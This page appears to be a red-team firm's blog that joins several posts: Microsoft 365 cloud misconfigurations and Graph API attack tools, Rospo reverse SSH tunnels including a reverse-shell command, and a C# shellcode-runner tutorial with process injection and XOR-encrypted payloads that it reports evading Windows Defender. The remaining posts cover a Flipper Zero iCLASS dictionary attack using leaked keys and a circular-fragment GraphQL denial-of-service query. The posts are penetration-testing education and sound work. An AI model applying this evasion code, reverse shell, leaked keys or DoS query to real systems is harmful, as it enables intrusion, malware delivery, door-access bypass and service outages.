• Your shield in Cyber Security

Cloud Misconfigurations

Cloud Misconfigurations

The cloud is heavily integrated into, if not the sole provider for, almost all services consumed on the internet today. This post briefly covers the current cloud marketplace background, and then looks at some of the red team tooling used, including an occasional meme and pop culture reference to take the edge off what may be a boring topic.

In true consultancy form, there are some remediations and recommendations to take away from this as well.

This blog is loosely structured to be broad initially, stating many well-known or accepted observations and anecdotes, becoming more technical as it progresses.

Don’t be concerned to leave off at any point, or skip to the parts further down, it is almost certain that one half has your type of content, the other doesn’t and the impact of reading only half is very low.

Die Wolke (The Cloud)

This is the cloud, there are many like it, but this one is not yours, it’s everyone’s and it’s everywhere. Without the cloud you are useless, you must use the cloud. You must use it better than your adversary who is trying to breach you. You must secure it before they hack you.

If life imitates art, does that mean something bad is coming for Gunnery Sergeant Microsoft? Microsoft Cloud revenue in 2023 was over $111 US billion, accounting for more than 50% of their total revenue for 2023 and a 22% increase from FY 202212. The recruits (clients) are not about to exit the cloud due to security concerns; the cloud is here to stay.

Cloud tenancies, be it Microsoft, AWS, or Google, have several baseline controls around users for security that are considered a ‘must’. These are simple at first look but grow considerably more complex as you implement controls. The larger the organizational structure, the harder it is to maintain a secure posture. Least privilege is an example of this, for a few users its simple, but in a large complex organization the privilege creep is real and trying to constrain privileges scales poorly.

The effort required to create, maintain, and enforce a policy for least privilege is significant. Frequently auditing user accounts and related privileges at scale may only be possible with automated tools. Failing to ensure users only have required privileges assigned to relevant accounts quite often leads to breaches that have significant impact.

Microsoft’s experience with Midnight Blizzard in Late 2023, early 2024 shows exactly that5. This breach was due to ‘a legacy non-production test tenant account’ but the account had permissions to somehow access ‘a very small percentage of Microsoft corporate email accounts’ which included a seemingly large number of departments from senior leadership, cybersecurity, legal and more.

The test account which should have no ability to access production, led to a significant problem due to the privileges assigned to that account. What other accounts or assets are languishing, forgotten by policy or ignored because they are ‘DMZ’, ‘test’ or otherwise.

One of the first rules of security is to know what you have in the way of assets. This used to be based on purchased hardware and software, a relatively direct equation. From this asset and inventory, you could work out what you had to manage, patch and update. With cloud tenancies there is a wider range of intangible items, software, applications, configuration, storage.

Remember when the default for S3 was open buckets? It was only set to default-block for new buckets in April 20231. Prior to this, S3 buckets with private files (based on sensitivity of content and expectation of user) but unfortunately set to public access, routinely appeared in the news headlines as the source of a data breach.

Configuration options for cloud are intended to make materials sharable, collaborative, and accessible to select parties. The likelihood of misconfiguring a multi-Tenant environment or a SharePoint Online site resulting in a data spill is not low.

Guides such as the Center for Internet Security (CIS) Microsoft 365 Foundations Benchmark2 and tools such as the Cybersecurity and Infrastructure Security Agency (CISA) Secure Cloud Business Applications (SCuBA)3 are good to get a handle on the current best practices and to help you and your organization conduct an audit for security controls against your Microsoft tenancy. These documents establish standards and can help to produce reports. The CISA SCuBA tool, can be run with credentials of a Microsoft Tenancy, and produce a report in an HTML formatted output, which also provides hyper-links to details for each of the controls it reports against. This can be used effectively and quickly, to assess the standing of your tenancy.

Some of those highlighted configurations, if found to be in a lax state, are worth taking time to correct urgently.

  • Legacy Authentication
  • MFA options for privileged users
  • Teams external contacts
  • Highly Privileged User Access
  • Consent to Applications

This user environment is only part of the picture when it comes to cloud breaches. Other services are used to store data but are not a direct user resource, such as Amazon Web Services (AWS) S3 buckets, Microsoft’s Azure Blob Storage and Google Cloud storage. These organizations have a market share of 32% for AWS, 23% for Azure and 10% for Google, the remainder being other companies, based on 2022 research4. The data stored in these locations also forms a type of asset that requires inventory and maintenance.

Who has access to these platforms, the storage buckets, the tenancies, applications, who’s account has privileges that let them do actions that may be more than they need and how do you find and fix these things?

A Penetration Testers Perspective:

Figure 1.  Team Scoping Meeting

“Microsoft Graph is a RESTful web API that enables you to access Microsoft Cloud service resources.”

An increasing number of cloud penetration test tools, rely on Microsoft Graph API. A recent release of a Command and Control (C2) tool, created by the USA based company Red Siege, backed their reasoning for creating the tool off the number of threat actors using the Graph API, a sound rationalisation. The tool is called GraphStrike and is available on GitHub. This extends on the C2 tool Cobalt Strike, by creating an HTTPS beacon over the Microsoft Graph API. This fits in as a post-compromise activity, once a user credential set has been breached, an attacker will go about setting up C2 communications, creating persistence mechanisms and gaining additional privileges. The GraphStrike tool sends data out from a compromised host over to graph.microsoft.com before being forwarded to the C2 server which is controlled by the attacker and issues the command and control. The advantage of doing this, is that a Microsoft subdomain looks far more trustworthy than a strange subdomain communicating at suspicious frequency periods. You are logging and analysing your traffic for strange things, correct?

The privileges attached to an account, even a basic users account, are critically important for an attacker to identify, the aim for more persistent threats being to establish C2. Equally it is therefore important for an organization to have a clear view on privileges in an environment. Often your ability to control account privileges in a large enterprise comes from having strong, clearly defined policy, implemented when an account is created and any time a change is made to an account. This should include clear offboarding steps for users when they depart.

A legacy authentication (No MFA) accessible account with no active user to report suspicious system behaviour would be very attractive to any attacker as an initial access vector. Once on this dormant account the attacker may use a tool such as GraphRunner, another tool freely available on GitHub, created by Black Hills Information Security. This tool is not a C2 related product but is a post-exploitation tool.

GraphRunner leverages PowerShell and an account with tenancy access, to complete a device authentication flow. Once that authentication flow is complete the tool has many built in commands to enumerate where the account has access to, using the Microsoft Graph API.

Figure 2. Initializing the GraphRunner Tool with Device Authentication against a Dev365 Tenancy

Figure 3. Completion of the Authentication and Note the Token Expiration Can be Extended.

Using Invoke-GraphRecon -Tokens $tokens we can explore what our account has permissions to do, in this case we have used a privileged user, however lower privileged accounts may have less to work with. The expiry of a token can be refreshed with Invoke-RefreshGraphTokens

Figure 4. Query Using the Broad Recon Command Invoke-GraphRecon

Figure 5. Some Policy Information Returned

Figure 6. User Access Rights Returned

Some of these User Settings and Policy Information results indicate that a high number of avenues are available. The field Users Can Consent to Apps: true implies that a user will be able to grant access to an application to be added to the tenancy, which can be beneficial to an attacker8, 9. A tool like GraphRunner can abuse this with a simple function Invoke-InjectOAuthApp to add an application to the tenancy and persist access through various state changes such as user password change and session expiry, using the app tokens. Fortunately, Microsoft provides advice on remediating illicitly granted applications10. If this feature is not required by an organisation, the feature for user consent to allow applications should be disabled. If it is required, then consenting by users for applications to access the organisation should require administrator approval.

Figure 7. Some Consent Options for Applications

The CISA tool SCuBA will report on such a configuration as seen below. Additionally, the SCuBA report embeds links to resources to aid understanding of the issue.

Figure 8. CISA SCuBA Audit Result for Applications Consent

Once an attacker understands what options exist on the compromised account, such as consenting to applications, the attacker can leverage this to grant themselves further access to things like sharepoint files as guest, persistence through app granting or privilege escalation through adding themselves to other groups, all this depends on the rights the compromised user has. Do your account management policies and processes cover how to manage each of these permissions?

Takeaway Points

  • Use templates such as CIS Benchmarks as a reference model for a mature cyber security posture.
  • Use tools such as CISA SCuBA and Graphrunner to gain visibility over your current configuration.
  • Consider that C2 tools can use Microsoft cloud infrastructure to establish legitimate looking network connections.
  • Understand that the tools mentioned in this article can be used together, stand alone, or not at all, don’t rely on the detection of any one thing for the defense of your important data and networks.
  • Legacy authentication, missing MFA, assets, permission and privileges are all important aspects that you need to have perspective and visibility into.
  • The cloud is a Stanley Kubrick film, full of horror scenes, but highly acclaimed as a masterpiece.

References

  • (13 Dec, 2022) Advanced notice: Amazon S3 will automatically enable S3 block public … Available at: https://aws.amazon.com/about-aws/whats-new/2022/12/amazon-s3-automatically-enable-block-public-access-disable-access-control-lists-buckets-april-2023/ (Accessed: 22 December 2023).
  • CIS Microsoft 365 Benchmarks, CIS. Available at: https://www.cisecurity.org/benchmark/microsoft_365 (Accessed: 30 January 2024).
  • Secure Cloud Business Applications (SCUBA) project: CISA, Cybersecurity and Infrastructure Security Agency CISA. Available at: https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project (Accessed: 30 January 2024).
  • Zheldak, P. (2024) AWS vs azure vs GCP [2024 cloud comparison guide], AWS vs Azure vs GCP [2024 Cloud Comparison Guide]. Available at: https://acropolium.com/blog/adopting-cloud-computing-aws-vs-azure-vs-google-cloud-what-platform-is-your-bet/ (Accessed: 30 January 2024).
  • (January 19, 2024) Microsoft Actions Following Attack by Nation State Actor Midnight Blizzard https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/ (Accessed: 29 January 2024).
  • GraphStrike: Using Microsoft Graph API to make beacon traffic disappear, redsiege.com. Available at: https://redsiege.com/blog/2024/01/graphstrike-release/ (Accessed: 30 January 2024).
  • GraphStrike: Anatomy of Offensive Tool Development, redsiege.com. Available at: https://redsiege.com/blog/2024/01/graphstrike-developer/ (Accessed: 30 January 2024).
  • RatulaC, Compromised and malicious applications investigation, Microsoft Learn. Available at: https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-compromised-malicious-app (Accessed: 30 January 2024).
  • Dansimp, App Consent grant investigation, Microsoft Learn. Available at: https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-app-consent#what-are-application-consent-grants (Accessed: 30 January 2024).
  • CISA releases Microsoft 365 Secure Configuration Baselines and scubagear tool: CISA (2024) Cybersecurity and Infrastructure Security Agency CISA. Available at: https://www.cisa.gov/news-events/alerts/2023/12/21/cisa-releases-microsoft-365-secure-configuration-baselines-and-scubagear-tool (Accessed: 30 January 2024).
  • Dafthack/graphrunner: A post-exploitation toolset for interacting with the microsoft graph api, GitHub. Available at: https://github.com/dafthack/GraphRunner (Accessed: 30 January 2024).
  • Microsoft annual report 2023 (Oct 16, 2023) Microsoft 2023 Annual Report. Available at: https://www.microsoft.com/investor/reports/ar23/index.html (Accessed: 31 January 2024).

Bibliography

  • CISA releases Microsoft 365 Secure Configuration Baselines and scubagear tool: CISA (2024) Cybersecurity and Infrastructure Security Agency CISA. Available at: https://www.cisa.gov/news-events/alerts/2023/12/21/cisa-releases-microsoft-365-secure-configuration-baselines-and-scubagear-tool (Accessed: 30 January 2024).
  • Cisagov () CISAGOV/ScubaGear: Automation to assess the state of your M365 tenant against Cisa’s baselines, GitHub. Available at: https://github.com/cisagov/ScubaGear (Accessed: 30 January 2024).
  • A hole in the bucket: The risk of public access to Cloud native storage (2023) YouTube. Available at: https://youtu.be/8IkLG60b7ec (Accessed: 30 January 2024).
  • RedSiege (Jan 2024) Redsiege/GraphStrike: Cobalt strike HTTPS beaconing over Microsoft Graph API, GitHub. Available at: https://github.com/RedSiege/GraphStrike (Accessed: 30 January 2024).

Stay Up to Date

Latest News

SSH Tunnelling with Rospo

SSH Tunnelling: A Brief Overview

SSH (Secure Shell) tunnelling is a method used to create an encrypted connection between a client and a server, allowing secure data transfer over an otherwise insecure network. It encapsulates the data in a secure shell SSH protocol, safeguarding it from potential eavesdropping, tampering, or interception.

At its core, SSH tunnelling establishes a secure channel over an unsecured network, ensuring the confidentiality and integrity of transmitted data. This technique is particularly useful in scenarios where sensitive information needs to traverse through potentially compromised networks, such as the internet.

The Benefits of SSH Tunnelling

  1. Data Encryption SSH tunnelling encrypts data transmissions, preventing unauthorized access to sensitive information.
  2. Network Security By creating a secure channel, SSH tunnelling mitigates the risks associated with unsecured networks, such as public Wi-Fi hotspots.
  3. Bypassing Restrictions SSH tunnelling can circumvent network restrictions imposed by firewalls or censorship, enabling access to restricted resources.
  4. Secure Remote Access It facilitates secure remote access to services like databases, file servers, or internal systems, enhancing productivity without compromising security.

 

Rospo: Persistent SSH Tunnelling

As all Testers and professionals would understand, the frustration of network dropouts and outages can cause the pulling of hair, smashed keyboards and even a thrown mouse if in an Offsec Exam.

With Rospo, the service will track and monitor network service and will continually attempt to reconnect the tunnel until successful again. What a win! Just like the Picasso image below, Rospo will continue hammering at the tunnel until a successful connection is established again!

Key Features of Rospo:

  1. Ease of use: Rospo offers an easy-to-use cli, with help options and example commands.
  2. Multi-Platform Support Whether you’re operating on Windows, macOS, or Linux, Rospo has you covered, ensuring seamless integration across diverse environments.
  3. Flexible Configuration With Rospo, users have granular control over tunnel configurations, allowing them to tailor settings according to their specific requirements.
  4. Dynamic Port Forwarding Rospo allows dynamic port forwarding, enabling users to securely access services hosted on remote servers with ease.
  5. Logging and Monitoring Rospo provides comprehensive logging and monitoring capabilities, empowering users to track tunnel activity and diagnose potential issues efficiently.

How to Get Started with Rospo:

Getting started with Rospo is ez pz. Simply head over to the GitHub repository, download the latest binary corresponding to your operating system, and you’re ready to rock and roll!

To get started with Rospo, you need to create SSH keys if not already made. For examples I will be using a Windows machine as the server, and a Kali machine for the client. On the Windows machine, open up a CMD or PowerShell prompt and use the command:

ssh-keygen -t rsa

Next, we need to put the id_rsa.pub onto the Kali machine.

Place it in the authorized_users file of the kali.

Now let’s start the ssh of the Kali machine:

sudo systemctl start ssh

Let’s try to SSH into the Kali now:

ssh kali@192.168.146.130

As Borat would say, Great Success!

Now we have access backwards, let’s set up Rospo to create a SSH tunnel that will continue through outages.

We create a reverse connection to our kali using the command:

.\rospo-windows-amd64.exe revshell kali@192.168.146.130:22 -T

Now to connect to it, we use on the kali:

ssh 127.0.0.1 -p 2222

Great Success! Let’s see what happens in a network outage.

As you can see, its monitoring picks up on the network termination and continuously tries to reconnect.

Let’s turn the network back on and see if it reconnects itself.

Nice it reconnected!

Now let’s see what else it can do, maybe create a secure tunnel for a Remote Desktop Connection?

As you can see, RDP is currently blocked for use. Let’s start-up Rospo with:

.\rospo-windows-amd64.exe tun reverse -l :3389 -r :3389 kali@192.168.146.130:22

Nice, the tunnel is now set!

We try and RDP in now.

Still denied? Thats because Rospo uses the SSH tunnel to proxy traffic to the RDP protocol, not directly open the protocol or port itself.

Rospo proxies the traffic into the client machine aka our Kali machine as shown below.

To connect we just need to run:

Remmina -c rdp://127.0.0.1

We now have a secure tunnel to RDP into our Windows machine!

Conclusion: Be like Borat, Have Great Success!

By leveraging tools like Rospo, users can persist with secure connections, use protocols such as RDP without opening the port to the wild and pwn those boxes without losing progress whenever the box blinks. Have fun, stay safe and get gud!

 

 

Stay Up to Date

Latest News

Exploring WinAPIs, C#, and Payload Encryption in Shellcode Runners

Introduction

C# stands out as a popular language choice within a red team’s arsenal for developing various penetration testing tools. Its versatility and efficiency make it a preferred choice for numerous penetration testing tools used worldwide, with prominent examples including Rubeus, Seatbelt, Watson, SharpView and SharpHound. While C# may not offer certain low-level functionalities inherent in languages like C or C++, such as direct memory manipulation, its strengths lie in other areas. C# provides in-memory execution and can be utilized to bypass detection and defences as .NET is installed on Windows by default.

This blog post aims to explore how WinAPIs, C# and Payload Encryption can be leveraged to develop shellcode runners that bypass modern antivirus solutions.

The Fundamentals

Before delving into shellcode runners in C# using WinAPIs, it’s assumed that readers have a foundational understanding of the language’s basics and the distinction between managed and unmanaged code. This assumption allows us to focus on more advanced topics, such as allocation of memory and remote thread execution. For those seeking a primer on C# fundamentals or a refresher on managed and unmanaged code, numerous resources are available to provide a solid grounding before delving into these more complex concepts.

WinAPIs

WinAPIs, or Windows Application Programming Interfaces, are a collection of functions and procedures exposed by the Windows operating system. These APIs provide developers with a means to interact with the underlying system, enabling the creation of Windows applications that can perform a wide range of tasks, from basic file operations to advanced system-level functions. WinAPIs serve as the bridge between application code and the operating system, allowing developers to access system resources, manipulate windows, handle input/output operations, and much more.

In the context of shellcode runners, WinAPIs play a crucial role in developing malicious payloads and evading detection. For example, by leveraging WinAPI functions such as VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, shellcode runners can allocate memory, write their shellcode into the address space of another process, and then execute it remotely. These APIs provide the necessary functionality to manipulate processes and memory at a low level, enabling attackers to inject and execute their malicious code stealthily. By understanding and utilizing WinAPIs effectively, attackers can enhance the stealth and effectiveness of their shellcode runners, making them more difficult to detect and mitigate.

The MessageBox Example

Before we jump straight to the fun stuff, let’s see an example using an unmanaged API call like MessageBox. Microsoft provides the syntax for the MessageBox prototype in C++, as shown below.

int MessageBox(

[in, optional] HWND    hWnd,

[in, optional] LPCTSTR lpText,

[in, optional] LPCTSTR lpCaption,

[in]           UINT    uType

);

However, since C# doesn’t have variable datatypes named HWND or LPCTSTR, we will need to convert these C++ data types to something we are more familiar with.

A data type conversion chart can be found below. This chart is from a post by Matt Hand at SpecterOps who explains a lot of the same topics discussed in this blog post.

Using this conversion chart, we can convert HWND to IntPtr and LPCTSTR to string.

The MessageBox prototype in C# will look like this.

int MessageBox(

    IntPtr    hWnd,

    string lpText,

    string lpCaption,

    uint    uType

);

Now that we have the MessageBox C# prototype, we can actually use it. To call the MessageBox function using P/Invoke in C#, we need to use the DllImport attribute to import the DLL that has the unmanaged code for us to use.

P/Invoke, short for Platform Invocation Services, is a powerful feature in C# that enables interoperability with native code libraries (often written in languages like C or C++) by allowing managed code to call unmanaged functions. This capability is particularly valuable in malware development, where access to low-level system functionality is necessary to perform various tasks, such as interacting with system APIs or manipulating memory directly. Most of the P/Invoke API is contained in two namespaces: System and System.Runtime.InteropServices.

According to the Microsoft Documentation, the dll for the MessageBox function is user32.dll.

The Dllimport will look like this:

[DllImport("user32.dll")]

public static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);

This is a very good start, now we can actually implement the external code (extern) to trigger a Message Box!

using System;

using System.Runtime.InteropServices;

// Required namespaces

 

namespace demo

    {

        class Program

        {

            [DllImport("user32.dll")]

            public static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);

            // MessageBox WinAPI Import

 

            static void Main(string[] args)

           {

                MessageBox(IntPtr.Zero, "Hello, this is a MessageBox!", "Alert", 0);

                // MessageBox Call

            }

        }

    }

In this example, the MessageBox function is called with parameters to display a simple message box with the text “Hello, this is a MessageBox!” and the title “Alert”.

Let’s build the project and see if it runs.

 

🎉🎉🎉

Constructing a Simple Shellcode Runner using WinAPIs

Now onto the fun stuff. We were able to display a Message Box using WinAPI, let’s see how we can create a simple shellcode runner.

For our simple shellcode runner, we will use the below WinAPIs:

  • VirtualAlloc to allocate memory,
  • CreateThread to create a thread, and
  • WaitForSingleObject to wait for the thread to exit.

Once again, we can use these WinAPIs in C# with the help of P/invoke. An amazing resource for P/Invoke can be found at https://www.pinvoke.dev/

using System.Runtime.InteropServices;

 

[DllImport("kernel32.dll")]

static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

 

[DllImport("kernel32.dll")]

static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

 

[DllImport("kernel32.dll")]

static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

Once the required WinAPIs are imported, we can start crafting our main method. We can start by initializing a byte array of our payload. For simplicity, I will be using an msfvenom generated payload that opens calc.exe.

byte[] buf = new byte[276] {<shellcode_here>};

 

With the byte array in our main method, we can start utilizing our WinAPIs. First, we will use VirtualAlloc to allocate memory for our shellcode. The address will be set to zero (IntPtr.Zero), allowing the system to determine the allocation location dynamically. The size of the allocated memory must match the size of the shellcode (buf.Length). The allocation should be flagged as MEM_COMMIT (0x1000) and MEM_RESERVE (0x2000) to commit and reserve the memory space in one step. The protection attribute should be set to PAGE_EXECUTE_READWRITE (0x40) to enable write and execution permissions of our shellcode within the allocated memory.

int size = buf.Length;

 

IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x1000 | 0x2000, 0x40);

We can utilize Marshal.Copy to insert our shellcode into the allocated memory space. This method requires four arguments: the byte array containing our shellcode, the starting index, the destination, and the size.

Marshal.Copy(buf, 0, addr, size);

The next step involves executing the shellcode, which can be achieved by utilizing CreateThread. Most of these arguments are not required for our purpose, so we can simply set them to 0 or IntPtr.Zero, appropriately. The only argument we care about is lpStartAddress, which we’ll set to the address of our allocated memory (addr).

IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

Finally, we’ll utilize WaitForSingleObject to instruct our thread to wait indefinitely. We’ll set the hHandle argument to our thread handle we created with CreateThead. The value 0xFFFFFFFF is used to specify an infinite timeout period.

WaitForSingleObject(hThread, 0xFFFFFFFF);

Combining all the above components, we get the below:

using System;

using System.Runtime.InteropServices;

 

namespace ConsoleApp1

{

    class Program

    {

        [DllImport("kernel32.dll")]

        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

 

        [DllImport("kernel32.dll")]

        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

 

        [DllImport("kernel32.dll")]

        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

 

        static void Main(string[] args)

        {

            byte[] buf = new byte[276] { <shellcode_here> };

 

            int size = buf.Length;

 

            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x1000 | 0x2000, 0x40);

 

            Marshal.Copy(buf, 0, addr, size);

 

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

 

            WaitForSingleObject(hThread, 0xFFFFFFFF);

        }

    }

}

Let’s build the shellcode runner and see if it runs.

 

Sweet! However, we aren’t done yet. Let’s turn on Windows Defender’s Real Time Protection and in my case, move the shellcode runner into a non-excluded folder. Upon executing the program again, we notice that Windows Defender eats this shellcode runner alive and prevents it from executing.

 

Modifying our Shellcode Runner

Let’s first modify our shellcode runner (without the msfvenom shellcode) to avoid detection because admittedly our current shellcode runner is very barebones and has most likely been used many times.

I’ve made a few modifications to the shellcode runner by utilizing a process injection technique.

Without going into too much detail about how to develop a shellcode runner utilizing process injection, I’ll briefing discuss the choice of WinAPIs. Firstly, we’ll be using OpenProcess to obtain a handle on a remote process. Then, instead of using VirtualAlloc, we’ll utilize VirtualAllocEx, as it allows memory allocation within another process’s address space. Similarly, we’ll use WriteProcessMemory instead of Marshal.Copy, as we’re now writing into a remote process. Finally, we’ll use CreateRemoteThread to create a thread within that process.

The DllImport’s for these WinAPIs can be seen below.

[DllImport("kernel32.dll")]

public static extern IntPtr OpenProcess(UInt32 dwDesiredAccess, bool bInheritHandle, UInt32 dwProcessId);

 

[DllImport("kernel32.dll")]

public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, UInt32 flAllocationType, UInt32 flProtect);

 

[DllImport("kernel32.dll")]

public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, ref int lpNumberOfBytesWritten);

 

[DllImport("kernel32.dll")]

public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref int lpThreadId);

Now lets compile this modified shellcode runner, replacing the msfvenom shellcode with dummy shellcode with the same size byte array length, and see how they compare to Windows Defender.

 

 

As we can see above, our shellcode runner template is no longer detected when using more complex techniques. Now let’s add our msfvenom shellcode byte array back into the modified shellcode runner.

 

Damn! Windows Defender once again detects our shellcode runner, even with the upgrades. But this was expected. While we’ve solved the problem of our shellcode runner template being detected, msfvenom payloads and many other commercial products, such as Cobalt Strike, are heavily signatured and are kill-on-site for most antivirus solutions. if not all.

You must be wondering, if the shellcode is being detected, how can we hide or obfuscate it? Well that leads us to the next section.

Payload Encryption

Over the years, numerous encryption and obfuscation techniques have been employed to circumvent signature detection in shellcode runners. We’ll delve into a few commonly utilized payload encryption methods and assess their effectiveness in evading detection by Microsoft’s Windows Defender.

Straight off the bat, we’ll test an absolute classic, the Caesar Cipher. The Caesar cipher on shellcode works by applying a fixed shift to each byte of the shellcode, providing a simple method of encryption.

I’ve encrypted the shellcode byte array with a fixed shift of 8 and crafted a simple decryption routine, as seen below:

static void Main(string[] args)

{

    ...

        byte[] encryptedBytes = { <encrypted_shellcode_here> };

        int key = 8;

        byte[] buf = CaesarDecryptBytes(encryptedBytes, key);

    ...

}

 

static byte[] CaesarDecryptBytes(byte[] encryptedBytes, int key)

    {

        byte[] decryptedBytes = new byte[encryptedBytes.Length];

        for (int i = 0; i < encryptedBytes.Length; i++)

        {

            int decryptedValue = (encryptedBytes[i] - key + 256) % 256;

            decryptedBytes[i] = (byte)decryptedValue;

        }

    return decryptedBytes;

    }

We’ll add the decryption routine to our modified shellcode runner, compile it and give it a run.

 

Honestly, I’m very surprised a simple encryption method like Caesar’s Cipher was able to bypass Windows Defender. Let’s compile the shellcode runner into a standalone executable using csc.exe and give it a try on a new up to date Windows 11 machine (as of writing this) to simulate a more realistic scenario.

 

 

I had a feeling it was too good to be true. Let’s try something a little bit more complex. Next, we’ll try XOR payload encryption. XOR on shellcode works by bitwise XORing each byte of the shellcode with a chosen key, yet again providing a simple yet effective method of encryption.

Once again, I’ve encrypted the shellcode with a key and crafted the below decryption routine:

static void Main(string[] args)

{

    ...

    byte[] encryptedBytes = { <XOR_encrypted_shellcode_here> };

    byte[] bytes = XorDecryptBytes(encryptedBytes, key);

    ...

}

 

static byte[] XorDecryptBytes(byte[] encryptedBytes, byte[] key)

{

    byte[] decryptedBytes = new byte[encryptedBytes.Length];

    int keyLength = key.Length;

    for (int i = 0; i < encryptedBytes.Length; i++)

    {

        byte encryptedByte = encryptedBytes[i];

        byte keyByte = key[i % keyLength];

        byte decryptedByte = (byte)(encryptedByte ^ keyByte);

        decryptedBytes[i] = decryptedByte;

    }

    return decryptedBytes;

}

We’ll add the decryption routine to our modified shellcode runner, compile it using csc.exe and give it a run.

 

 

Once again caught on a new Windows 11 machine. I could potentially buff up the modified shellcode runner using Delegates, which allows wrapping methods within a class, and a stronger encryption, such as Advanced Encryption Standard (AES). However, I decided to rewrite the shellcode runner again using the QueueUserAPC EarlyBird technique.

This technique involves using the QueueUserAPC function to inject shellcode into the address space of a remote process. By leveraging this technique, the shellcode can execute its payload before many security mechanisms have fully initialized, increasing its chances of remaining undetected. This approach is particularly effective because it allows malicious code to execute in the context of a legitimate process, making it harder for security software, such as Windows Defender, to detect.

The QueueUserAPC prototype can be seen below.

DWORD QueueUserAPC(

    [in] PAPCFUNC  pfnAPC,

    [in] HANDLE    hThread,

    [in] ULONG_PTR dwData

);

With the upgraded shellcode runner and our XOR encryption routine in place, compile it using csc.exe and give it a run.

 

 

Perfect! Our shellcode was successfully decrypted and executed without being detected, giving us that beautiful calculator.

Conclusion

This blog hopefully serves as a brief introduction into C# shellcode runners and their potential to circumvent modern antivirus solutions. However, in the broader context of malware development, this only begins to touch upon the surface. Numerous challenges lie ahead, including behavioural detection, Endpoint Detection and Response (EDR) systems, and the ever-evolving cat and mouse chase. Moreover, many WinAPIs, both documented and undocumented, that were not discussed in this blog can be leveraged to create advanced shellcode runners and red team tools. Keep learning and get creative!

References

Thanks to all these amazing blogs and articles, in which this blog was heavily inspired by:

Stay Up to Date

Latest News

iCLASS Dictionary Attack

Summary 

By default, using the PicoPass application on a FlipperZero to perform a dictionary attack on an iCLASS key fob has a very small number of keys available, resulting in a low success rate. This can be improved by including the 700+keys in the iCopyX leak. The exact iCLASS key fob is shown in the images below. The firmware used for this attack is Unleashed Development version with extra apps (878E).

Problem

When attempting an attack using the built in Elite Dict.Attack method found in the PicoPass application, only 25 or 28 keys are actually tried.

Updating the Keys file

On the version of Unleashed firmware that I’m running the key file for the dictionary attack is located at SD Card/apps_assets/picopass/iclass_elite-dict.txt

The actual contents of the file look like this. Although the screenshot above shows 28 keys being attempted, the file actually only contains 25 so we are not sure what the true number is.

The actual leak of the 700+ from keys from iCopyX can be found in here. https://pastebin.com/raw/KWcu0ch6

The original file as shown above is stored in this repo as iclass_elite_dict_original.txt so if you want to restore later you can just rename this file to iclass_elite_dict.txt and copy it back to your FlipperZero in the original location of SD Card/apps_assets/picopass/iclass_elite-dict.txt.

  1. Copy the file from the SD card, to do this you can either remove the SD card or use the qFlipper application or just download the one attached to this repo.
  2. Copy all of the keys from pastebin link above and paste them into the file you downloaded. I put them after the key C1B74D7478053AE2 but I’m not sure it would really matter.

3. Your key file should look like the below screenshot.

4. Now just use your preferred method to transfer this file back to the flipper if you are using qFlipper you may have to delete the original file first.

Attack with extra keys

After re-running the attack many more keys are shown to be tried.

After trying 300 odd keys very quickly the correct one was found.

From here I was able to save the key.

As I understand, it is not possible to write it to another blank key fob however I was able to successfully emulate the key fob using the FlipperZero and have it open the door.

Stay Up to Date

Latest News

Causing Service Degradation within GraphQL

This article will focus on causing a service degradation and denial of service attacks using quirks that are part of the GraphQL specification by design.

For these exercises we will use Damn Vulnerable GraphQL project. If you wish to follow along, we recommend using the docker instance, otherwise you risk triggering a DOS against yourself!

DOS on APIs? Surely rate limiting will solve this?

Unfortunately, rate limiting will do nothing to prevent these types of attacks. Unlike typical DOS/DDOS attacks where a large volume of traffic are pointed towards an endpoint with the intent to take it offline, these are logic-based attacks that if crafted appropriately, need only a single request to take the service offline. Given a single request would appear to be normal traffic to a rate limiting appliance, it will not help here.

Infinite Loops: The Hidden Hazard of GraphQL Fragments

Fragments. A fantastic showcase of what can go wrong when well-meaning functionality is used in an unexpected manner. Essentially these prevent you from having to individually type out the same subset of field names over and over in extended length queries. Think of it like setting a bash alias for commands you run frequently. For more detail, check this Apollo doco.

They are defined like so:

fragment NAMEYOUMADEUP on Object_type_name_that_exists {
field1
field2
}

This is a real example, from the example application used in this article:

fragment CommonFields on PasteObject {
title
content
}

When used, even though we have only put the alias into the query blob, we can see the results are still retrieved.

It is important to note that the three periods prior to the fragment name is not filler. This is called a spread operator, and is required when calling a fragment as part of a query.

You may have an idea what is coming next. What if we were to define two fragments, and have them call each other, like so?
query {
pastes{
…CommonFields
…TestFields
}

}

fragment CommonFields on PasteObject {
…TestFields
}

fragment TestFields on PasteObject {
…CommonFields
}

If you run this yourself, you will be very glad you ran it in docker. The circular, unending and unresolvable nature of the query takes the instance down. A true denial of service, using a single query and a feature that is built into the GraphQL specification. The only information you need to perform this attack is the name of a single object type. We simply reuse PasteObject for both fragments, and this is enough information to perform the attack.

